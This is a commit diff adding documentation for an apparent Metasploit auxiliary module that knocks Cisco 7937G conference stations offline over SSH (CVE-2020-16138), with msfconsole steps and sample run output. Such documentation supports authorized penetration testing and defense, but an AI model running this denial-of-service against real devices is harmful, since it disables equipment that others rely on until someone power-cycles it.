parent
45ef9f9324
commit
b461f4ede8
|
@ -0,0 +1,47 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
1. Obtain a Cisco 7937G Conference Station.
|
||||||
|
2. Enable SSH Access on the device.
|
||||||
|
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do: `use auxiliary/dos/cisco/CVE-2020-16138`
|
||||||
|
3. Do: `set RHOST 192.168.1.10`
|
||||||
|
4. Do: `run`
|
||||||
|
5. The conference station should now be inoperable until it is power cycled
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
1. rhost (required) - Target addres
|
||||||
|
2. timeout (not required) - Timeout in seconds to wait before aborting
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
#### Successful Scenario:
|
||||||
|
```
|
||||||
|
[*] Starting server...
|
||||||
|
[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
|
||||||
|
[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
|
||||||
|
[-] 192.168.110.209 - Traceback (most recent call last):
|
||||||
|
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
|
||||||
|
[-] 192.168.110.209 - self._handler_table[ptype](self, m)
|
||||||
|
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
|
||||||
|
[-] 192.168.110.209 - self._parse_kex_init(m)
|
||||||
|
[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
|
||||||
|
[-] 192.168.110.209 - raise SSHException(
|
||||||
|
[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
|
||||||
|
[-] 192.168.110.209 -
|
||||||
|
[*] 192.168.110.209 - DoS non-reset attack completed!
|
||||||
|
[*] 192.168.110.209 - Errors are intended.
|
||||||
|
[*] 192.168.110.209 - Device must be power cycled to restore functionality.
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Unsuccessful Scenario:
|
||||||
|
```
|
||||||
|
[*] Starting server...
|
||||||
|
[-] 192.168.110.209 - Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
Loading…
Reference in New Issue